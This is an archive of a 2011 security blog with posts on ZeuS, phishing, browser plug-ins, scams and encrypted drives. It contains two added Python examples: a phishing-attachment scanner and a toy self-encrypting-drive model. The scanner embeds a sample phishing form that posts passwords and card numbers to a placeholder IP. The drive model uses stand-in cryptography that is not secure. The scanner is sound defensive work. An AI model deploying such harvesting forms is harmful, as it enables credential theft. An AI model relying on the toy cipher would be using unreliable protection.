The Security Detail

March 3, 2011  10:56 PM

The Gods Must Be Crazy…Or, At Least ZeuS

Tony Bradley

In Greek mythology, Zeus was the head honcho. But, he was a capricious, fallible, often vengeful god (aren’t they all?). Zeus seems like an apropos namesake for the massive, pervasive malware that threatens PC users.

The creator of ZeuS allegedly went into “retirement” last fall. Apparently, the malware business had taken its toll and he was ready to cash in on his ill-gotten gains to sip pina coladas on a beach in the Caribbean. So, he did the only sensible thing and turned over the source code for ZeuS to his arch-nemesis–the malware developer behind SpyEye.

ZeuS arrives in many forms, like FDIC phishing scams, or UPS phishing scams. AppRiver’s Fred Touchette provides an excellent analysis of the ZeuS botnet, and the emerging threat of hybrid ZeuS / SpyEye malware attacks.

*Bonus Note: If you have not seen the movie “The Gods Must Be Crazy”, I highly recommend it. It is one of the funniest movies I have ever seen.

*Bonus Bonus Note: Admittedly, it takes a certain sense of humor to relate. Some people don’t get it. If you are one of these people, perhaps watching it in an altered state might make it funnier.

February 27, 2011  11:18 AM

Prepare for Impending EU Data Breach Notification Mandate

Tony Bradley

As of May 25, 2011, new data breach notification rules will be enforced across the European Union. Despite increased awareness and efforts to implement technology to protect data, breaches seem to occur at an alarming rate. Users–those who trusted their personal information and sensitive data to a third-party organization–deserve to know when that information has been exposed or compromised in any way.

A recent discussion in the Zecurion Group on LinkedIn (you may have to be a member of LinkedIn, if not of the Zecurion Group, to read it; joining is free) highlights the upcoming EU mandate, and provides an extensive, detailed look at the elements of the data breach notification rules and how to implement effective compliance.

The report shared in the Zecurion Group ends with this summary:

At any rate, ENISA already provides us with useful examples of practices in Europe, helping the stakeholders in their study of the question:

  • The risks should be clearly identified.
  • Breaches should be evaluated and prioritised before notifying it to data protection authorities and data subjects.
  • The means of notifications should be specifically decided by the operators and used without undue delay.
  • Regulatory authorities should strengthen compliance.
  • Private operators and data protection authorities should usefully cooperate to enforce the security through this new procedure.

February 27, 2011  9:59 AM

Is Your Browser Secure? I Doubt It

Tony Bradley

The various browser vendors continue to enhance the security in the browser with each new release. For example, Internet Explorer 9 is significantly more secure than Internet Explorer 6. But, even if you are using the latest version of your chosen Web browser and you have kept it patched and up to date, there is still only a one-in-five chance that your browser is secure.

A study conducted by Qualys found that 80 percent of Web browsers have holes. Or, as InformationWeek phrases it, “Roughly 80 percent of browsers today are insecure, owing to their having a known vulnerability either in the browser itself, or due to a vulnerable plug-in, such as an outdated version of Shockwave, Flash, the Java runtime environment, or QuickTime.”

The article goes on to state that more than half of the vulnerabilities stem from plug-ins, adding, “The most common insecure browser plug-ins in use are (in order): Java, Adobe Reader, QuickTime, Flash, Shockwave, and Windows Media Player. Many of these plug-ins are widespread–97 percent of computers have the Adobe Flash plug-in installed, and 95 percent have one for Windows Media Player.”

The problem is that the browsers generally have an automatic update feature of some sort, and users are pretty good about keeping the browser up to date, but forget about the plug-ins. Even with updated plug-ins, though, there are still known vulnerabilities that remain exposed in the browsers themselves as well.

You can employ third-party tools like Invincea Browser Protection for an extra layer of defense, or just exercise extreme caution when surfing the Web. Rather than treating your Web surfing like you are strolling through your own back yard with an armed security escort, think of it like you got lost on the wrong side of town, your cell phone battery is dead, and you are trying to navigate dark alleys at night to make it safely home.

February 27, 2011  9:27 AM

From the “WTF? Are You Serious??” Vault

Tony Bradley

I have a simple rule: If someone you don’t know asks you for money online, it is guaranteed to be a scam. There is a corollary that goes with the one simple rule: If someone you do know asks you for money online, you should pretend you don’t know them and follow the one simple rule.

The Nigerian fraud scam predates the World Wide Web, email, and the Internet, yet it remains surprisingly effective. It amazes me, though, that there are still people who aren’t familiar with the concept, or that are still gullible/naive enough to believe that an exiled Nigerian prince needs your help and wants to share his millions with you in appreciation. Seriously?

There are other variations–like the scam that a man from Naperville, IL fell victim to. This man has been under the misguided impression for two years that he is in a relationship with a mysterious woman on the Internet. He never actually met the woman, but that hasn’t stopped him from sending over $200,000 to her over the two years. You would think it might have raised a red flag or two when he was wiring money to accounts in multiple countries–including the United States, England, Malaysia, and…NIGERIA!

There is some humorous irony in that the scammer went too far by claiming to be kidnapped and requiring ransom–leading the Naperville man to involve authorities for “her” rescue. Instead, the police had to sit the guy down and break it to him that he has been getting scammed for two years and his “girlfriend” doesn’t exist.

February 25, 2011  10:23 PM

Apple Invites Scrutiny of Mac OS X Security

Tony Bradley

Apple unveiled details of the upcoming Mac OS X 10.7, a.k.a. “Lion”, a few months back. The company is still hard at work developing the OS, and apparently Apple is taking security much more seriously with this next release of the flagship OS.

Apple has reportedly invited expert security researchers to analyze an early preview release of the OS and provide feedback. Dino Dai Zovi–co-author of The Mac Hacker’s Handbook, and Charlie Miller–Dai Zovi’s co-author and perennial winner of the Pwn2Own race to hack the Mac, are among those invited to scrutinize Lion.

According to a report from ComputerWorld’s Greg Keizer, the researchers must agree to an NDA which bars them from sharing anything they might find with the public. Keizer quotes Miller, stating, “They’ve never done this before. That they’re thinking of reaching out [to researchers] is a good positive step, but whether it makes a difference, I’ll believe it when I see it.”

February 24, 2011  3:39 PM

PayPal Users Targeted by Phishing Attack…Again

Tony Bradley

It just sort of comes with the territory. If you have a massive financial network online that allows people to transfer money back and forth, the dark side of the Internet is going to recognize the opportunity that presents and take advantage of it. The fact that most PayPal users are not all that technically savvy and know little about information security just makes them that much more attractive targets.

Fred Touchette from AppRiver has a detailed breakdown of this latest threat. He notes that this particular PayPal phishing scam is unique in its brazen approach and lack of attempt to hide the source of the attack. “Notice how they request in the email that you enable Javascript and ActiveX? This is so the functionality in the attachment will post your information properly. I can’t say I’ve seen this in the body of a phishing email before. That could be due in part to the popularity of plug-ins such as NoScript for Firefox, or the built-in script squashing functionality of the Chrome browser that doesn’t allow hidden Javascript to run without approval.”

The phishing email contains the obligatory spelling and grammatical errors that should be red flags to any recipient above the third or fourth grade level. In closing, let me just remind everyone once again not to open file attachments–especially file attachments claiming to be from some financial institution you do business with directing you to fill out some attached form. PayPal, your bank, and any other reputable business will not ask you for sensitive information via email or with a file attachment.
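The traits Touchette describes (an attachment that needs JavaScript or ActiveX to work, and a form that posts your details somewhere) can be checked for statically before anyone opens the file. The scanner below is an added example, not AppRiver’s or PayPal’s code; the attachment it inspects is constructed, and the 198.51.100.7 address in it is a documentation placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment: the "fill out this form" lure described above.
SAMPLE_ATTACHMENT = """<html><body><h2>Account Verification</h2>
<script>document.forms[0].action = "http://198.51.100.7/cgi-bin/post.php";</script>
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<form method="post" action="http://198.51.100.7/cgi-bin/post.php">
  Email: <input name="email"> Password: <input type="password" name="pass">
  Card number: <input name="ccnum"> <input type="submit" value="Verify">
</form></body></html>"""

class AttachmentScanner(HTMLParser):
    """Collects indicators from the markup; scan_attachment() turns them into findings."""
    def __init__(self):
        super().__init__()
        self.findings, self.form_hosts, self.sensitive_inputs = [], [], 0

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # valueless attributes become ""
        if tag == "script":
            self.findings.append("requires JavaScript")
        elif tag == "object" and a.get("classid", "").lower().startswith("clsid:"):
            self.findings.append("embeds ActiveX object")
        elif tag == "form":
            self.form_hosts.append(urlparse(a.get("action", "")).hostname or "")
        elif tag == "input":
            name = a.get("name", "").lower()
            if a.get("type", "").lower() == "password" or any(
                    k in name for k in ("pass", "cc", "card", "ssn")):
                self.sensitive_inputs += 1

def scan_attachment(html, claimed_domain):
    """Return (score, findings); a higher score is a stronger phishing signal.
    claimed_domain is the brand the e-mail purports to come from."""
    p = AttachmentScanner()
    p.feed(html)
    for host in p.form_hosts:
        # A form that posts anywhere but the claimed brand's own domain is the key tell.
        if host and host != claimed_domain and not host.endswith("." + claimed_domain):
            p.findings.append(f"form posts to external host {host}")
    if p.sensitive_inputs:
        p.findings.append(f"{p.sensitive_inputs} credential/card field(s) requested")
    return len(p.findings), p.findings

if __name__ == "__main__":
    print(scan_attachment(SAMPLE_ATTACHMENT, "paypal.com"))
```

The score is a triage signal for a mail gateway or analyst queue, not a verdict; a legitimate form that stays on the brand’s own domain and asks for nothing sensitive scores zero.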

February 21, 2011  12:54 PM

Apple Looks to Protect Data with “Safe Deposit Box”

Tony Bradley

Based on a recent patent filing with the United States Patent and Trademark Office, Apple has plans to imitate a bank safe deposit box with a digital version designed to protect sensitive data.

A post from provides a detailed look at how the patent application describes the potential data security measure. Basically, the “safe deposit box” would be a folder or partition specifically designated for secure storage. Files dragged to the safe deposit box would have additional security measures in place and require user authentication to access, à la verifying one’s identity and providing the necessary key in order to access a bank safe deposit box.

But, imagine if your bank somehow duplicated your sensitive and priceless possessions from your safe deposit box, and stored the copies in another safe deposit box at another bank as an added precaution? Well, Apple plans to do that as well. Files stored in the safe deposit box will be automatically copied to secure storage in the cloud.

Conceptually, it sounds nice. But, like most approaches to data protection the Achilles heel is the user. The success or value of an approach like this relies on the user’s ability to determine what data is important or sensitive, and the user’s execution to make sure the data gets stored in the right folder.

Assuming a user with the ability and willingness to follow through, the safe deposit box seems like a reasonable method of data protection.

February 21, 2011  12:10 PM

Winamp Forums Security Breached

Tony Bradley

A post on the Winamp Forums titled Winamp Forums Security Breach FAQ explains that a security breach was detected. The post states, “My name is Geno Yoham and I am the General Manager of Winamp. Our entire team is dedicated to protecting the privacy of our users and has put extensive measures in place to ensure your information remains secure. As a result of these precautions, we quickly detected and blocked an attack on the Winamp Forums database. We have confirmed that this breach was isolated to the Winamp Forum ( site only. Other Winamp sites and products such as, and the Winamp Desktop Media Player were not affected in any way.”

The FAQ response to the question “What happened?” is ambiguous and elusive: “As a result of our continuous security monitoring, we identified and blocked this attack. Additionally, new security measures have been deployed to help keep this type of breach from happening in the future.”

Great, but um…..what happened?

Winamp claims that there is no evidence that any information other than email addresses was exposed, but it is directing Winamp Forums users to change their account passwords as a precaution. The FAQ also reiterates that standard security best practices suggest that users should be changing their passwords regularly anyway.

February 19, 2011  7:06 AM

The Internet “Kill Switch” Controversy

Tony Bradley

When protests gained momentum in Egypt, the government forced the shutdown of Internet access and other forms of communication to prevent protesters from being able to work together and organize effectively. The same thing is going on in other countries faced with political upheaval as well.

At face value, giving the government the ability to shut off such a critical lifeline to the world as the Internet seems ridiculous. However, there are actually some legitimate cases where the government might want such a capability–not to oppress the people, but to defend them.

As Americans, we don’t want the government to have any undue power or control. But, a case can be made that it is in our best interests from a national security perspective to allow the government to shut off portions of the Internet in the event of a cyber attack against the nation. Shutting down the affected portions of the Internet can contain the threat and prevent any further spread or damage while responding to the attack.

According to an article on the Senate bill from USA Today, “The Cybersecurity and Internet Freedom Act aims to protect critical infrastructures that Americans rely on–the power grid, financial systems and water supply, among other things–in the event of a potentially crippling digital assault. It does not, as its authors say, give anyone the authority to choke off the Internet with the flick of a so-called “kill switch,” as some of its critics contend.”

I get it. The country is very polarized in its political alignment, and we only trust administrations we support. Armed political militias and rhetoric about defending the Constitution all but died during the Bush administration–while the government pushed through the PATRIOT Act without debate or reasonable consideration, and illegally spied on citizens, and found clever loopholes allowing prisoners to be “legally” tortured and circumventing the Fourth, Fifth, and Sixth amendments to the Constitution.

Yet, suddenly when the Obama administration wants to solve the healthcare epidemic armed militias show up at rallies, and conservative mouthpieces like Glenn Beck and Rush Limbaugh stoke the fires of tinfoil hat conspiracy theorists suggesting the President is not an American citizen, or he’s a Muslim (as if that would somehow disqualify him for the office of President).

Conversely, I was quite sure that Bush, Cheney, and Rove had an overt disdain for the Constitution and how it got in the way of them doing what they wanted to do, and that the Bush administration did more damage to the United States and the world than any government leadership of any nation in decades. Yet, I fully support President Obama and I have faith that he is focused on the best interests of the nation.

My point is, I am sure that the reality lies somewhere in the middle, and the government has an obligation to protect and defend the nation. Cries of “kill switch” are akin to cries of “death panel” in the healthcare debate, or the “birther” movement to prove President Obama is not an American citizen. They are silly, ridiculous distractions.

I don’t know if the bill currently before the Senate is the right bill to get the job done. But, I do know it addresses a need, and that it should be considered and debated–rationally.

February 14, 2011  11:49 AM

Seagate Announces Milestone for Self-Encrypting Drives

Tony Bradley

Seagate announced a major milestone at the RSA Security Conference: it has shipped over a million self-encrypting laptop and enterprise hard drives. Six major manufacturers–including Dell and Fujitsu–have helped drive the success of the drives.

Laptops in particular are easily lost or stolen, and often contain gigabytes upon gigabytes of confidential company information, or private client or customer data. It is critical to protect that data–and for many organizations it is mandated by compliance requirements. Seagate’s Momentus self-encrypting drives (SEDs) can help ensure that the data is not compromised or exposed.

The Seagate press release explains, “The AES encryption chip in the Momentus SEDs automatically and transparently encrypts all drive data, not just selected files or partitions. The 2.5-inch drive also eliminates disk initialization and configuration required by encryption software, allows IT administrators to instantly erase all data cryptographically so the drive can be quickly and easily redeployed, and delivers full inline-speed encryption with no impact to system performance.”

With more vendor support and industry cooperation, as well as government certifications, it may not take long for Seagate to hit that two million mark.
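What makes the “instantly erase all data cryptographically” claim in the press release work is a two-key design: the media is encrypted under a key that never leaves the drive, and the user credential only unwraps that key. The model below is an added illustration, not Seagate’s firmware or any Momentus implementation detail; the drive’s AES engine is stood in for by SHA-256 in counter mode, and the PBKDF2 credential derivation is likewise an assumption made so the block runs on the standard library.

```python
import hashlib, hmac, os, secrets

def keystream(key, nonce, length):
    """SHA-256 in counter mode: a stand-in for the drive's AES engine."""
    blocks = (hashlib.sha256(key + nonce.to_bytes(8, "big") + i.to_bytes(4, "big")).digest()
              for i in range((length + 31) // 32))
    return b"".join(blocks)[:length]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

class ToySED:
    """Media is encrypted under a per-drive DEK that never leaves the device;
    a user credential only unwraps that DEK via a derived key (KEK)."""
    def __init__(self, password):
        self.media = {}        # sector -> ciphertext exactly as stored on the platters
        self._dek = None       # plaintext DEK, held only while the drive is unlocked
        self._provision(password, secrets.token_bytes(32))

    def _kek(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 100_000)

    def _provision(self, password, dek):
        """Wrap a DEK under the credential; the DEK itself is never stored in clear."""
        self.salt = os.urandom(16)
        kek = self._kek(password)
        self.wrapped_dek = xor(dek, keystream(kek, 0, 32))
        self.tag = hmac.new(kek, self.wrapped_dek, "sha256").digest()

    def unlock(self, password):
        kek = self._kek(password)
        if not hmac.compare_digest(self.tag, hmac.new(kek, self.wrapped_dek, "sha256").digest()):
            return False
        self._dek = xor(self.wrapped_dek, keystream(kek, 0, 32))
        return True

    def _key(self):
        if self._dek is None:
            raise PermissionError("drive is locked")
        return self._dek

    def write(self, sector, data):   # transparent: callers never see ciphertext
        self.media[sector] = xor(data, keystream(self._key(), sector + 1, len(data)))

    def read(self, sector):
        ct = self.media[sector]
        return xor(ct, keystream(self._key(), sector + 1, len(ct)))

    def crypto_erase(self, new_password):
        """Instant erase for redeployment: only the DEK changes. Old ciphertext
        stays on the media untouched but no longer decrypts to anything meaningful."""
        self._provision(new_password, secrets.token_bytes(32))
        self._dek = None
```

Because the erase never touches the stored sectors, it takes the same time on a 2 TB drive as on a 2 MB one; the trade-off is that the old DEK’s destruction is the only thing standing between the recycled drive and its former contents, which is why the key must live in hardware rather than on disk.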
